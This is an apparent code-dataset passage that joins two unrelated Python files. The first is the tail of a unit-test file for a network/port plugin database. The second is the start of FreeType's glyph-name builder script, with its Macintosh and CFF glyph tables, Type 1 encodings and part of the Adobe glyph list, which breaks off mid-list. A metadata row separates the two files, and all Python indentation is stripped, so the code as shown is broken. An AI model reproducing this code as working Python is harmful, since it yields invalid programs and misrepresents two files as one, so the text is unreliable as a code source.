if "plugin_test" in net["net-name"]:
count += 1
self.assertTrue(count == 2)
self.teardown_network_port()
def testc_delete_network(self):
"""Test to delete network."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
self.assertTrue(net1["net-name"] == "plugin_test1")
self.dbtest.delete_network(net1["net-id"])
nets = self.dbtest.get_all_networks(self.tenant_id)
count = 0
for net in nets:
if "plugin_test1" in net["net-name"]:
count += 1
self.assertTrue(count == 0)
self.teardown_network_port()
def testd_update_network(self):
"""Test to update (rename) network."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
self.assertTrue(net1["net-name"] == "plugin_test1")
net = self.dbtest.update_network(self.tenant_id, net1["net-id"],
name="plugin_test1_renamed")
self.assertTrue(net["net-name"] == "plugin_test1_renamed")
self.teardown_network_port()
def teste_create_port(self):
"""Test to create port."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
port = self.dbtest.create_port(net1["net-id"])
self.assertTrue(port["net-id"] == net1["net-id"])
ports = self.dbtest.get_all_ports(net1["net-id"])
count = 0
for por in ports:
count += 1
self.assertTrue(count == 1)
self.teardown_network_port()
def testf_delete_port(self):
"""Test to delete port."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
port = self.dbtest.create_port(net1["net-id"])
self.assertTrue(port["net-id"] == net1["net-id"])
ports = self.dbtest.get_all_ports(net1["net-id"])
count = 0
for por in ports:
count += 1
self.assertTrue(count == 1)
for por in ports:
self.dbtest.delete_port(net1["net-id"], por["port-id"])
ports = self.dbtest.get_all_ports(net1["net-id"])
count = 0
for por in ports:
count += 1
self.assertTrue(count == 0)
self.teardown_network_port()
def testg_plug_unplug_interface(self):
"""Test to plug/unplug interface."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
port1 = self.dbtest.create_port(net1["net-id"])
self.dbtest.plug_interface(net1["net-id"], port1["port-id"], "vif1.1")
port = self.dbtest.get_port(net1["net-id"], port1["port-id"])
self.assertTrue(port[0]["int-id"] == "vif1.1")
self.dbtest.unplug_interface(net1["net-id"], port1["port-id"])
port = self.dbtest.get_port(net1["net-id"], port1["port-id"])
self.assertTrue(port[0]["int-id"] is None)
self.teardown_network_port()
def testh_joined_test(self):
"""Test to get network and port."""
net1 = self.dbtest.create_network("t1", "net1")
port1 = self.dbtest.create_port(net1["net-id"])
self.assertTrue(port1["net-id"] == net1["net-id"])
port2 = self.dbtest.create_port(net1["net-id"])
self.assertTrue(port2["net-id"] == net1["net-id"])
ports = self.dbtest.get_all_ports(net1["net-id"])
for port in ports:
net = port["net"]
LOG.debug("Port id %s Net id %s" % (port["port-id"], net.uuid))
self.teardown_joined_test()
def teardown_network_port(self):
"""tearDown for Network and Port table."""
networks = self.dbtest.get_all_networks(self.tenant_id)
for net in networks:
netid = net["net-id"]
name = net["net-name"]
if "plugin_test" in name:
ports = self.dbtest.get_all_ports(netid)
for por in ports:
self.dbtest.delete_port(netid, por["port-id"])
self.dbtest.delete_network(netid)
def teardown_joined_test(self):
"""tearDown for joined Network and Port test."""
LOG.debug("Tearing Down Network and Ports")
nets = self.dbtest.get_all_networks("t1")
for net in nets:
netid = net["net-id"]
ports = self.dbtest.get_all_ports(netid)
for port in ports:
self.dbtest.delete_port(port["net-id"], port["port-id"])
self.dbtest.delete_network(netid)
| apache-2.0 | -817,420,369,707,387,600 | 38.621705 | 79 | 0.558382 | false |
clangen/projectM-musikcube | src/WinLibs/freetype-2.3.5/src/tools/glnames.py | 16 | 103307 | #!/usr/bin/env python
#
#
# FreeType 2 glyph name builder
#
# Copyright 1996-2000, 2003, 2005, 2007 by
# David Turner, Robert Wilhelm, and Werner Lemberg.
#
# This file is part of the FreeType project, and may only be used, modified,
# and distributed under the terms of the FreeType project license,
# LICENSE.TXT. By continuing to use, modify, or distribute this file you
# indicate that you have read the license and understand and accept it
# fully.
"""\
usage: %s <output-file>
This python script generates the glyph names tables defined in the
PSNames module.
Its single argument is the name of the header file to be created.
"""
import sys, string, struct, re, os.path
# This table lists the glyphs according to the Macintosh specification.
# It is used by the TrueType Postscript names table.
#
# See
#
# http://fonts.apple.com/TTRefMan/RM06/Chap6post.html
#
# for the official list.
#
mac_standard_names = \
[
# 0
".notdef", ".null", "nonmarkingreturn", "space", "exclam",
"quotedbl", "numbersign", "dollar", "percent", "ampersand",
# 10
"quotesingle", "parenleft", "parenright", "asterisk", "plus",
"comma", "hyphen", "period", "slash", "zero",
# 20
"one", "two", "three", "four", "five",
"six", "seven", "eight", "nine", "colon",
# 30
"semicolon", "less", "equal", "greater", "question",
"at", "A", "B", "C", "D",
# 40
"E", "F", "G", "H", "I",
"J", "K", "L", "M", "N",
# 50
"O", "P", "Q", "R", "S",
"T", "U", "V", "W", "X",
# 60
"Y", "Z", "bracketleft", "backslash", "bracketright",
"asciicircum", "underscore", "grave", "a", "b",
# 70
"c", "d", "e", "f", "g",
"h", "i", "j", "k", "l",
# 80
"m", "n", "o", "p", "q",
"r", "s", "t", "u", "v",
# 90
"w", "x", "y", "z", "braceleft",
"bar", "braceright", "asciitilde", "Adieresis", "Aring",
# 100
"Ccedilla", "Eacute", "Ntilde", "Odieresis", "Udieresis",
"aacute", "agrave", "acircumflex", "adieresis", "atilde",
# 110
"aring", "ccedilla", "eacute", "egrave", "ecircumflex",
"edieresis", "iacute", "igrave", "icircumflex", "idieresis",
# 120
"ntilde", "oacute", "ograve", "ocircumflex", "odieresis",
"otilde", "uacute", "ugrave", "ucircumflex", "udieresis",
# 130
"dagger", "degree", "cent", "sterling", "section",
"bullet", "paragraph", "germandbls", "registered", "copyright",
# 140
"trademark", "acute", "dieresis", "notequal", "AE",
"Oslash", "infinity", "plusminus", "lessequal", "greaterequal",
# 150
"yen", "mu", "partialdiff", "summation", "product",
"pi", "integral", "ordfeminine", "ordmasculine", "Omega",
# 160
"ae", "oslash", "questiondown", "exclamdown", "logicalnot",
"radical", "florin", "approxequal", "Delta", "guillemotleft",
# 170
"guillemotright", "ellipsis", "nonbreakingspace", "Agrave", "Atilde",
"Otilde", "OE", "oe", "endash", "emdash",
# 180
"quotedblleft", "quotedblright", "quoteleft", "quoteright", "divide",
"lozenge", "ydieresis", "Ydieresis", "fraction", "currency",
# 190
"guilsinglleft", "guilsinglright", "fi", "fl", "daggerdbl",
"periodcentered", "quotesinglbase", "quotedblbase", "perthousand",
"Acircumflex",
# 200
"Ecircumflex", "Aacute", "Edieresis", "Egrave", "Iacute",
"Icircumflex", "Idieresis", "Igrave", "Oacute", "Ocircumflex",
# 210
"apple", "Ograve", "Uacute", "Ucircumflex", "Ugrave",
"dotlessi", "circumflex", "tilde", "macron", "breve",
# 220
"dotaccent", "ring", "cedilla", "hungarumlaut", "ogonek",
"caron", "Lslash", "lslash", "Scaron", "scaron",
# 230
"Zcaron", "zcaron", "brokenbar", "Eth", "eth",
"Yacute", "yacute", "Thorn", "thorn", "minus",
# 240
"multiply", "onesuperior", "twosuperior", "threesuperior", "onehalf",
"onequarter", "threequarters", "franc", "Gbreve", "gbreve",
# 250
"Idotaccent", "Scedilla", "scedilla", "Cacute", "cacute",
"Ccaron", "ccaron", "dcroat"
]
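# A hypothetical helper (illustrative only, not part of the original
# tool) showing how this table is consumed: a format 2.0 `post' table
# entry whose glyph name index is below 258 resolves directly into the
# list above.
#
def mac_standard_name( index ):
  """Return the Macintosh standard glyph name for `index', or None."""
  if 0 <= index < len( mac_standard_names ):
    return mac_standard_names[index]
  return None
# e.g. mac_standard_name( 3 ) == "space", mac_standard_name( 210 ) == "apple"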
# The list of standard `SID' glyph names. For the official list,
# see Annex A of the document at
#
# http://partners.adobe.com/asn/developer/pdfs/tn/5176.CFF.pdf.
#
sid_standard_names = \
[
# 0
".notdef", "space", "exclam", "quotedbl", "numbersign",
"dollar", "percent", "ampersand", "quoteright", "parenleft",
# 10
"parenright", "asterisk", "plus", "comma", "hyphen",
"period", "slash", "zero", "one", "two",
# 20
"three", "four", "five", "six", "seven",
"eight", "nine", "colon", "semicolon", "less",
# 30
"equal", "greater", "question", "at", "A",
"B", "C", "D", "E", "F",
# 40
"G", "H", "I", "J", "K",
"L", "M", "N", "O", "P",
# 50
"Q", "R", "S", "T", "U",
"V", "W", "X", "Y", "Z",
# 60
"bracketleft", "backslash", "bracketright", "asciicircum", "underscore",
"quoteleft", "a", "b", "c", "d",
# 70
"e", "f", "g", "h", "i",
"j", "k", "l", "m", "n",
# 80
"o", "p", "q", "r", "s",
"t", "u", "v", "w", "x",
# 90
"y", "z", "braceleft", "bar", "braceright",
"asciitilde", "exclamdown", "cent", "sterling", "fraction",
# 100
"yen", "florin", "section", "currency", "quotesingle",
"quotedblleft", "guillemotleft", "guilsinglleft", "guilsinglright", "fi",
# 110
"fl", "endash", "dagger", "daggerdbl", "periodcentered",
"paragraph", "bullet", "quotesinglbase", "quotedblbase", "quotedblright",
# 120
"guillemotright", "ellipsis", "perthousand", "questiondown", "grave",
"acute", "circumflex", "tilde", "macron", "breve",
# 130
"dotaccent", "dieresis", "ring", "cedilla", "hungarumlaut",
"ogonek", "caron", "emdash", "AE", "ordfeminine",
# 140
"Lslash", "Oslash", "OE", "ordmasculine", "ae",
"dotlessi", "lslash", "oslash", "oe", "germandbls",
# 150
"onesuperior", "logicalnot", "mu", "trademark", "Eth",
"onehalf", "plusminus", "Thorn", "onequarter", "divide",
# 160
"brokenbar", "degree", "thorn", "threequarters", "twosuperior",
"registered", "minus", "eth", "multiply", "threesuperior",
# 170
"copyright", "Aacute", "Acircumflex", "Adieresis", "Agrave",
"Aring", "Atilde", "Ccedilla", "Eacute", "Ecircumflex",
# 180
"Edieresis", "Egrave", "Iacute", "Icircumflex", "Idieresis",
"Igrave", "Ntilde", "Oacute", "Ocircumflex", "Odieresis",
# 190
"Ograve", "Otilde", "Scaron", "Uacute", "Ucircumflex",
"Udieresis", "Ugrave", "Yacute", "Ydieresis", "Zcaron",
# 200
"aacute", "acircumflex", "adieresis", "agrave", "aring",
"atilde", "ccedilla", "eacute", "ecircumflex", "edieresis",
# 210
"egrave", "iacute", "icircumflex", "idieresis", "igrave",
"ntilde", "oacute", "ocircumflex", "odieresis", "ograve",
# 220
"otilde", "scaron", "uacute", "ucircumflex", "udieresis",
"ugrave", "yacute", "ydieresis", "zcaron", "exclamsmall",
# 230
"Hungarumlautsmall", "dollaroldstyle", "dollarsuperior", "ampersandsmall",
"Acutesmall",
"parenleftsuperior", "parenrightsuperior", "twodotenleader",
"onedotenleader", "zerooldstyle",
# 240
"oneoldstyle", "twooldstyle", "threeoldstyle", "fouroldstyle",
"fiveoldstyle",
"sixoldstyle", "sevenoldstyle", "eightoldstyle", "nineoldstyle",
"commasuperior",
# 250
"threequartersemdash", "periodsuperior", "questionsmall", "asuperior",
"bsuperior",
"centsuperior", "dsuperior", "esuperior", "isuperior", "lsuperior",
# 260
"msuperior", "nsuperior", "osuperior", "rsuperior", "ssuperior",
"tsuperior", "ff", "ffi", "ffl", "parenleftinferior",
# 270
"parenrightinferior", "Circumflexsmall", "hyphensuperior", "Gravesmall",
"Asmall",
"Bsmall", "Csmall", "Dsmall", "Esmall", "Fsmall",
# 280
"Gsmall", "Hsmall", "Ismall", "Jsmall", "Ksmall",
"Lsmall", "Msmall", "Nsmall", "Osmall", "Psmall",
# 290
"Qsmall", "Rsmall", "Ssmall", "Tsmall", "Usmall",
"Vsmall", "Wsmall", "Xsmall", "Ysmall", "Zsmall",
# 300
"colonmonetary", "onefitted", "rupiah", "Tildesmall", "exclamdownsmall",
"centoldstyle", "Lslashsmall", "Scaronsmall", "Zcaronsmall",
"Dieresissmall",
# 310
"Brevesmall", "Caronsmall", "Dotaccentsmall", "Macronsmall", "figuredash",
"hypheninferior", "Ogoneksmall", "Ringsmall", "Cedillasmall",
"questiondownsmall",
# 320
"oneeighth", "threeeighths", "fiveeighths", "seveneighths", "onethird",
"twothirds", "zerosuperior", "foursuperior", "fivesuperior",
"sixsuperior",
# 330
"sevensuperior", "eightsuperior", "ninesuperior", "zeroinferior",
"oneinferior",
"twoinferior", "threeinferior", "fourinferior", "fiveinferior",
"sixinferior",
# 340
"seveninferior", "eightinferior", "nineinferior", "centinferior",
"dollarinferior",
"periodinferior", "commainferior", "Agravesmall", "Aacutesmall",
"Acircumflexsmall",
# 350
"Atildesmall", "Adieresissmall", "Aringsmall", "AEsmall", "Ccedillasmall",
"Egravesmall", "Eacutesmall", "Ecircumflexsmall", "Edieresissmall",
"Igravesmall",
# 360
"Iacutesmall", "Icircumflexsmall", "Idieresissmall", "Ethsmall",
"Ntildesmall",
"Ogravesmall", "Oacutesmall", "Ocircumflexsmall", "Otildesmall",
"Odieresissmall",
# 370
"OEsmall", "Oslashsmall", "Ugravesmall", "Uacutesmall",
"Ucircumflexsmall",
"Udieresissmall", "Yacutesmall", "Thornsmall", "Ydieresissmall",
"001.000",
# 380
"001.001", "001.002", "001.003", "Black", "Bold",
"Book", "Light", "Medium", "Regular", "Roman",
# 390
"Semibold"
]
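# A hypothetical helper (illustrative only): in a CFF font, SID values
# below 391 refer to the standard strings above, while larger values
# index the font's own string INDEX.
#
def sid_standard_name( sid ):
  """Return the standard string for `sid', or None if not standard."""
  if 0 <= sid < len( sid_standard_names ):
    return sid_standard_names[sid]
  return None
# e.g. sid_standard_name( 0 ) == ".notdef", sid_standard_name( 390 ) == "Semibold"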
# This table maps character codes of the Adobe Standard Type 1
# encoding to glyph indices in the sid_standard_names table.
#
t1_standard_encoding = \
[
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 2, 3, 4, 5, 6, 7, 8,
9, 10, 11, 12, 13, 14, 15, 16, 17, 18,
19, 20, 21, 22, 23, 24, 25, 26, 27, 28,
29, 30, 31, 32, 33, 34, 35, 36, 37, 38,
39, 40, 41, 42, 43, 44, 45, 46, 47, 48,
49, 50, 51, 52, 53, 54, 55, 56, 57, 58,
59, 60, 61, 62, 63, 64, 65, 66, 67, 68,
69, 70, 71, 72, 73, 74, 75, 76, 77, 78,
79, 80, 81, 82, 83, 84, 85, 86, 87, 88,
89, 90, 91, 92, 93, 94, 95, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 96, 97, 98, 99, 100, 101, 102, 103, 104,
105, 106, 107, 108, 109, 110, 0, 111, 112, 113,
114, 0, 115, 116, 117, 118, 119, 120, 121, 122,
0, 123, 0, 124, 125, 126, 127, 128, 129, 130,
131, 0, 132, 133, 0, 134, 135, 136, 137, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 138, 0, 139, 0, 0,
0, 0, 140, 141, 142, 143, 0, 0, 0, 0,
0, 144, 0, 0, 0, 145, 0, 0, 146, 147,
148, 149, 0, 0, 0, 0
]
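# Decoding a character code under the Adobe Standard encoding is thus a
# double lookup -- first through `t1_standard_encoding', then through
# `sid_standard_names'.  A minimal sketch, illustrative only:
#
def t1_standard_glyph_name( code ):
  """Return the glyph name for character `code' (0..255) in the Adobe
     Standard encoding."""
  return sid_standard_names[t1_standard_encoding[code]]
# e.g. t1_standard_glyph_name( ord( "A" ) ) == "A"
#      t1_standard_glyph_name( 0xA1 )       == "exclamdown"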
# This table maps character codes of the Adobe Expert Type 1
# encoding to glyph indices in the sid_standard_names table.
#
t1_expert_encoding = \
[
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 229, 230, 0, 231, 232, 233, 234,
235, 236, 237, 238, 13, 14, 15, 99, 239, 240,
241, 242, 243, 244, 245, 246, 247, 248, 27, 28,
249, 250, 251, 252, 0, 253, 254, 255, 256, 257,
0, 0, 0, 258, 0, 0, 259, 260, 261, 262,
0, 0, 263, 264, 265, 0, 266, 109, 110, 267,
268, 269, 0, 270, 271, 272, 273, 274, 275, 276,
277, 278, 279, 280, 281, 282, 283, 284, 285, 286,
287, 288, 289, 290, 291, 292, 293, 294, 295, 296,
297, 298, 299, 300, 301, 302, 303, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 304, 305, 306, 0, 0, 307, 308, 309, 310,
311, 0, 312, 0, 0, 313, 0, 0, 314, 315,
0, 0, 316, 317, 318, 0, 0, 0, 158, 155,
163, 319, 320, 321, 322, 323, 324, 325, 0, 0,
326, 150, 164, 169, 327, 328, 329, 330, 331, 332,
333, 334, 335, 336, 337, 338, 339, 340, 341, 342,
343, 344, 345, 346, 347, 348, 349, 350, 351, 352,
353, 354, 355, 356, 357, 358, 359, 360, 361, 362,
363, 364, 365, 366, 367, 368, 369, 370, 371, 372,
373, 374, 375, 376, 377, 378
]
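# The same double lookup works for the Expert encoding.  A minimal
# sketch, illustrative only:
#
def t1_expert_glyph_name( code ):
  """Return the glyph name for character `code' (0..255) in the Adobe
     Expert encoding."""
  return sid_standard_names[t1_expert_encoding[code]]
# e.g. t1_expert_glyph_name( 0x21 ) == "exclamsmall"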
# This data has been taken literally from the file `glyphlist.txt',
# version 2.0, 22 Sept 2002. It is available from
#
# http://partners.adobe.com/asn/developer/typeforum/unicodegn.html
# http://partners.adobe.com/public/developer/en/opentype/glyphlist.txt
#
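# Each record below has the form `name;codes', where `codes' is one or
# more 4-digit hexadecimal Unicode values; several values mean the name
# maps to a codepoint sequence (e.g. "dalethatafpatah;05D3 05B2").  A
# minimal parsing sketch, illustrative only -- nothing below depends on
# this helper:
#
def parse_agl_record( record ):
  """Split one glyph list record into ( name, [codepoint, ...] )."""
  name, codes = string.split( record, ";" )
  return name, [int( c, 16 ) for c in string.split( codes )]
# e.g. parse_agl_record( "AE;00C6" ) == ( "AE", [0x00C6] )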
adobe_glyph_list = """\
A;0041
AE;00C6
AEacute;01FC
AEmacron;01E2
AEsmall;F7E6
Aacute;00C1
Aacutesmall;F7E1
Abreve;0102
Abreveacute;1EAE
Abrevecyrillic;04D0
Abrevedotbelow;1EB6
Abrevegrave;1EB0
Abrevehookabove;1EB2
Abrevetilde;1EB4
Acaron;01CD
Acircle;24B6
Acircumflex;00C2
Acircumflexacute;1EA4
Acircumflexdotbelow;1EAC
Acircumflexgrave;1EA6
Acircumflexhookabove;1EA8
Acircumflexsmall;F7E2
Acircumflextilde;1EAA
Acute;F6C9
Acutesmall;F7B4
Acyrillic;0410
Adblgrave;0200
Adieresis;00C4
Adieresiscyrillic;04D2
Adieresismacron;01DE
Adieresissmall;F7E4
Adotbelow;1EA0
Adotmacron;01E0
Agrave;00C0
Agravesmall;F7E0
Ahookabove;1EA2
Aiecyrillic;04D4
Ainvertedbreve;0202
Alpha;0391
Alphatonos;0386
Amacron;0100
Amonospace;FF21
Aogonek;0104
Aring;00C5
Aringacute;01FA
Aringbelow;1E00
Aringsmall;F7E5
Asmall;F761
Atilde;00C3
Atildesmall;F7E3
Aybarmenian;0531
B;0042
Bcircle;24B7
Bdotaccent;1E02
Bdotbelow;1E04
Becyrillic;0411
Benarmenian;0532
Beta;0392
Bhook;0181
Blinebelow;1E06
Bmonospace;FF22
Brevesmall;F6F4
Bsmall;F762
Btopbar;0182
C;0043
Caarmenian;053E
Cacute;0106
Caron;F6CA
Caronsmall;F6F5
Ccaron;010C
Ccedilla;00C7
Ccedillaacute;1E08
Ccedillasmall;F7E7
Ccircle;24B8
Ccircumflex;0108
Cdot;010A
Cdotaccent;010A
Cedillasmall;F7B8
Chaarmenian;0549
Cheabkhasiancyrillic;04BC
Checyrillic;0427
Chedescenderabkhasiancyrillic;04BE
Chedescendercyrillic;04B6
Chedieresiscyrillic;04F4
Cheharmenian;0543
Chekhakassiancyrillic;04CB
Cheverticalstrokecyrillic;04B8
Chi;03A7
Chook;0187
Circumflexsmall;F6F6
Cmonospace;FF23
Coarmenian;0551
Csmall;F763
D;0044
DZ;01F1
DZcaron;01C4
Daarmenian;0534
Dafrican;0189
Dcaron;010E
Dcedilla;1E10
Dcircle;24B9
Dcircumflexbelow;1E12
Dcroat;0110
Ddotaccent;1E0A
Ddotbelow;1E0C
Decyrillic;0414
Deicoptic;03EE
Delta;2206
Deltagreek;0394
Dhook;018A
Dieresis;F6CB
DieresisAcute;F6CC
DieresisGrave;F6CD
Dieresissmall;F7A8
Digammagreek;03DC
Djecyrillic;0402
Dlinebelow;1E0E
Dmonospace;FF24
Dotaccentsmall;F6F7
Dslash;0110
Dsmall;F764
Dtopbar;018B
Dz;01F2
Dzcaron;01C5
Dzeabkhasiancyrillic;04E0
Dzecyrillic;0405
Dzhecyrillic;040F
E;0045
Eacute;00C9
Eacutesmall;F7E9
Ebreve;0114
Ecaron;011A
Ecedillabreve;1E1C
Echarmenian;0535
Ecircle;24BA
Ecircumflex;00CA
Ecircumflexacute;1EBE
Ecircumflexbelow;1E18
Ecircumflexdotbelow;1EC6
Ecircumflexgrave;1EC0
Ecircumflexhookabove;1EC2
Ecircumflexsmall;F7EA
Ecircumflextilde;1EC4
Ecyrillic;0404
Edblgrave;0204
Edieresis;00CB
Edieresissmall;F7EB
Edot;0116
Edotaccent;0116
Edotbelow;1EB8
Efcyrillic;0424
Egrave;00C8
Egravesmall;F7E8
Eharmenian;0537
Ehookabove;1EBA
Eightroman;2167
Einvertedbreve;0206
Eiotifiedcyrillic;0464
Elcyrillic;041B
Elevenroman;216A
Emacron;0112
Emacronacute;1E16
Emacrongrave;1E14
Emcyrillic;041C
Emonospace;FF25
Encyrillic;041D
Endescendercyrillic;04A2
Eng;014A
Enghecyrillic;04A4
Enhookcyrillic;04C7
Eogonek;0118
Eopen;0190
Epsilon;0395
Epsilontonos;0388
Ercyrillic;0420
Ereversed;018E
Ereversedcyrillic;042D
Escyrillic;0421
Esdescendercyrillic;04AA
Esh;01A9
Esmall;F765
Eta;0397
Etarmenian;0538
Etatonos;0389
Eth;00D0
Ethsmall;F7F0
Etilde;1EBC
Etildebelow;1E1A
Euro;20AC
Ezh;01B7
Ezhcaron;01EE
Ezhreversed;01B8
F;0046
Fcircle;24BB
Fdotaccent;1E1E
Feharmenian;0556
Feicoptic;03E4
Fhook;0191
Fitacyrillic;0472
Fiveroman;2164
Fmonospace;FF26
Fourroman;2163
Fsmall;F766
G;0047
GBsquare;3387
Gacute;01F4
Gamma;0393
Gammaafrican;0194
Gangiacoptic;03EA
Gbreve;011E
Gcaron;01E6
Gcedilla;0122
Gcircle;24BC
Gcircumflex;011C
Gcommaaccent;0122
Gdot;0120
Gdotaccent;0120
Gecyrillic;0413
Ghadarmenian;0542
Ghemiddlehookcyrillic;0494
Ghestrokecyrillic;0492
Gheupturncyrillic;0490
Ghook;0193
Gimarmenian;0533
Gjecyrillic;0403
Gmacron;1E20
Gmonospace;FF27
Grave;F6CE
Gravesmall;F760
Gsmall;F767
Gsmallhook;029B
Gstroke;01E4
H;0048
H18533;25CF
H18543;25AA
H18551;25AB
H22073;25A1
HPsquare;33CB
Haabkhasiancyrillic;04A8
Hadescendercyrillic;04B2
Hardsigncyrillic;042A
Hbar;0126
Hbrevebelow;1E2A
Hcedilla;1E28
Hcircle;24BD
Hcircumflex;0124
Hdieresis;1E26
Hdotaccent;1E22
Hdotbelow;1E24
Hmonospace;FF28
Hoarmenian;0540
Horicoptic;03E8
Hsmall;F768
Hungarumlaut;F6CF
Hungarumlautsmall;F6F8
Hzsquare;3390
I;0049
IAcyrillic;042F
IJ;0132
IUcyrillic;042E
Iacute;00CD
Iacutesmall;F7ED
Ibreve;012C
Icaron;01CF
Icircle;24BE
Icircumflex;00CE
Icircumflexsmall;F7EE
Icyrillic;0406
Idblgrave;0208
Idieresis;00CF
Idieresisacute;1E2E
Idieresiscyrillic;04E4
Idieresissmall;F7EF
Idot;0130
Idotaccent;0130
Idotbelow;1ECA
Iebrevecyrillic;04D6
Iecyrillic;0415
Ifraktur;2111
Igrave;00CC
Igravesmall;F7EC
Ihookabove;1EC8
Iicyrillic;0418
Iinvertedbreve;020A
Iishortcyrillic;0419
Imacron;012A
Imacroncyrillic;04E2
Imonospace;FF29
Iniarmenian;053B
Iocyrillic;0401
Iogonek;012E
Iota;0399
Iotaafrican;0196
Iotadieresis;03AA
Iotatonos;038A
Ismall;F769
Istroke;0197
Itilde;0128
Itildebelow;1E2C
Izhitsacyrillic;0474
Izhitsadblgravecyrillic;0476
J;004A
Jaarmenian;0541
Jcircle;24BF
Jcircumflex;0134
Jecyrillic;0408
Jheharmenian;054B
Jmonospace;FF2A
Jsmall;F76A
K;004B
KBsquare;3385
KKsquare;33CD
Kabashkircyrillic;04A0
Kacute;1E30
Kacyrillic;041A
Kadescendercyrillic;049A
Kahookcyrillic;04C3
Kappa;039A
Kastrokecyrillic;049E
Kaverticalstrokecyrillic;049C
Kcaron;01E8
Kcedilla;0136
Kcircle;24C0
Kcommaaccent;0136
Kdotbelow;1E32
Keharmenian;0554
Kenarmenian;053F
Khacyrillic;0425
Kheicoptic;03E6
Khook;0198
Kjecyrillic;040C
Klinebelow;1E34
Kmonospace;FF2B
Koppacyrillic;0480
Koppagreek;03DE
Ksicyrillic;046E
Ksmall;F76B
L;004C
LJ;01C7
LL;F6BF
Lacute;0139
Lambda;039B
Lcaron;013D
Lcedilla;013B
Lcircle;24C1
Lcircumflexbelow;1E3C
Lcommaaccent;013B
Ldot;013F
Ldotaccent;013F
Ldotbelow;1E36
Ldotbelowmacron;1E38
Liwnarmenian;053C
Lj;01C8
Ljecyrillic;0409
Llinebelow;1E3A
Lmonospace;FF2C
Lslash;0141
Lslashsmall;F6F9
Lsmall;F76C
M;004D
MBsquare;3386
Macron;F6D0
Macronsmall;F7AF
Macute;1E3E
Mcircle;24C2
Mdotaccent;1E40
Mdotbelow;1E42
Menarmenian;0544
Mmonospace;FF2D
Msmall;F76D
Mturned;019C
Mu;039C
N;004E
NJ;01CA
Nacute;0143
Ncaron;0147
Ncedilla;0145
Ncircle;24C3
Ncircumflexbelow;1E4A
Ncommaaccent;0145
Ndotaccent;1E44
Ndotbelow;1E46
Nhookleft;019D
Nineroman;2168
Nj;01CB
Njecyrillic;040A
Nlinebelow;1E48
Nmonospace;FF2E
Nowarmenian;0546
Nsmall;F76E
Ntilde;00D1
Ntildesmall;F7F1
Nu;039D
O;004F
OE;0152
OEsmall;F6FA
Oacute;00D3
Oacutesmall;F7F3
Obarredcyrillic;04E8
Obarreddieresiscyrillic;04EA
Obreve;014E
Ocaron;01D1
Ocenteredtilde;019F
Ocircle;24C4
Ocircumflex;00D4
Ocircumflexacute;1ED0
Ocircumflexdotbelow;1ED8
Ocircumflexgrave;1ED2
Ocircumflexhookabove;1ED4
Ocircumflexsmall;F7F4
Ocircumflextilde;1ED6
Ocyrillic;041E
Odblacute;0150
Odblgrave;020C
Odieresis;00D6
Odieresiscyrillic;04E6
Odieresissmall;F7F6
Odotbelow;1ECC
Ogoneksmall;F6FB
Ograve;00D2
Ogravesmall;F7F2
Oharmenian;0555
Ohm;2126
Ohookabove;1ECE
Ohorn;01A0
Ohornacute;1EDA
Ohorndotbelow;1EE2
Ohorngrave;1EDC
Ohornhookabove;1EDE
Ohorntilde;1EE0
Ohungarumlaut;0150
Oi;01A2
Oinvertedbreve;020E
Omacron;014C
Omacronacute;1E52
Omacrongrave;1E50
Omega;2126
Omegacyrillic;0460
Omegagreek;03A9
Omegaroundcyrillic;047A
Omegatitlocyrillic;047C
Omegatonos;038F
Omicron;039F
Omicrontonos;038C
Omonospace;FF2F
Oneroman;2160
Oogonek;01EA
Oogonekmacron;01EC
Oopen;0186
Oslash;00D8
Oslashacute;01FE
Oslashsmall;F7F8
Osmall;F76F
Ostrokeacute;01FE
Otcyrillic;047E
Otilde;00D5
Otildeacute;1E4C
Otildedieresis;1E4E
Otildesmall;F7F5
P;0050
Pacute;1E54
Pcircle;24C5
Pdotaccent;1E56
Pecyrillic;041F
Peharmenian;054A
Pemiddlehookcyrillic;04A6
Phi;03A6
Phook;01A4
Pi;03A0
Piwrarmenian;0553
Pmonospace;FF30
Psi;03A8
Psicyrillic;0470
Psmall;F770
Q;0051
Qcircle;24C6
Qmonospace;FF31
Qsmall;F771
R;0052
Raarmenian;054C
Racute;0154
Rcaron;0158
Rcedilla;0156
Rcircle;24C7
Rcommaaccent;0156
Rdblgrave;0210
Rdotaccent;1E58
Rdotbelow;1E5A
Rdotbelowmacron;1E5C
Reharmenian;0550
Rfraktur;211C
Rho;03A1
Ringsmall;F6FC
Rinvertedbreve;0212
Rlinebelow;1E5E
Rmonospace;FF32
Rsmall;F772
Rsmallinverted;0281
Rsmallinvertedsuperior;02B6
S;0053
SF010000;250C
SF020000;2514
SF030000;2510
SF040000;2518
SF050000;253C
SF060000;252C
SF070000;2534
SF080000;251C
SF090000;2524
SF100000;2500
SF110000;2502
SF190000;2561
SF200000;2562
SF210000;2556
SF220000;2555
SF230000;2563
SF240000;2551
SF250000;2557
SF260000;255D
SF270000;255C
SF280000;255B
SF360000;255E
SF370000;255F
SF380000;255A
SF390000;2554
SF400000;2569
SF410000;2566
SF420000;2560
SF430000;2550
SF440000;256C
SF450000;2567
SF460000;2568
SF470000;2564
SF480000;2565
SF490000;2559
SF500000;2558
SF510000;2552
SF520000;2553
SF530000;256B
SF540000;256A
Sacute;015A
Sacutedotaccent;1E64
Sampigreek;03E0
Scaron;0160
Scarondotaccent;1E66
Scaronsmall;F6FD
Scedilla;015E
Schwa;018F
Schwacyrillic;04D8
Schwadieresiscyrillic;04DA
Scircle;24C8
